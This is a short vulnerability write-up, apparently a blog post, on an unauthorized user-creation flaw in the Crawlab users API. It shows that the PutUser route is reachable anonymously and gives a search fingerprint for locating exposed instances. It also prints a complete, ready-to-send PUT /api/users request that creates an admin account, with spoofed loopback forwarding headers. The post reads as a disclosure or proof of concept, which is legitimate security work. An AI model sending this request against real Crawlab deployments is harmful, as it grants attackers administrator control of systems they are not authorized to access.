Post

Crawlab Users Add Vulnerabilities To Any User

Crawlab Users Add Vulnerabilities To Any User

Crawlab users Add vulnerabilities to any user

Vulnerability Description

The Crawlab users API has any user added and is added as an unauthorized interface. You can further attack in the background after adding it.

Vulnerability Impact

Crawlab v0.0.1

Network surveying and mapping

title=”Crawlab”

Vulnerability reappears

Login page

img

First check the route location main.go file

img

1
2
anonymousGrou 中为匿名可调用方法
authGroup	  中为认证可调用方法

You can see that the Putuser method is to add a user, but there is an anonymous call.

img

Generate requests to add users based on fields

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PUT /api/users HTTP/1.1
Host: 
Content-Length: 83
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_c35e3a563a06caee2524902c81975add=1639222117,1639278935; Hm_lpvt_c35e3a563a06caee2524902c81975add=1639278935
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close

{"username":"testppp","password":"testppp","role":"admin","email":"testppp@qq.com"}

img

img

This post is licensed under CC BY 4.0 by the author.